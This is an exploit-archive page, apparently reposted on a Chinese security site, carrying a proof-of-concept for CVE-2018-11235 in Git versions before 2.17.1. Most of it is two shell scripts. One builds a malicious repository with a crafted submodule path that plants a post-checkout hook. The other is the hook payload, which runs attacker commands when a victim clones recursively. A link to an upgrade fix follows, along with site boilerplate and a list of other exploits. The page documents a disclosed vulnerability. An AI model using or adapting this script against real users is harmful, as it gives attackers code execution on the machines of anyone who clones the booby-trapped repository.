Git < 2.17.1 - Remote Code Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Git < 2.17.1 - Remote Code Execution

来源：jameelnabbo.com 作者：Nabbo 发布时间：2018-06-11

# Exploit Title: Git (code execution)
# Date: 2018-05-29
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: https://github.com/git/git <https://github.com/git/git>
# CVE: CVE-2018-11235
#Version: <=2.17.1
# Tested on Kali Linux

P0C:

Create two files:
pwned.sh: the file which will contain our commands to be executed
commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file

add the follwing to Pwned.sh:
#!/bin/sh
cat << EOF

#here we can put our lovely commands
Exploited! : $(ifconfig)

EOF

#--------

Add the follwing to commit.sh file:
#!/bin/sh

set -e

repo_dir="$PWD/repo"
#change it to any other Repo
repo_submodule='https://github.com/JameelNabbo/SmartWorm'

git init "$repo_dir"
cd "$repo_dir"
git submodule add "$repo_submodule" pwned
mkdir modules
cp -r .git/modules/pwned modules
cp ../pwned.sh modules/pwned/hooks/post-checkout
git config -f .gitmodules submodule.pwned.update checkout
git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned
git add modules
git submodule add "$repo_submodule"
git add SmartWorm
git commit -am pwned
echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`”

——————
Solution:
https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告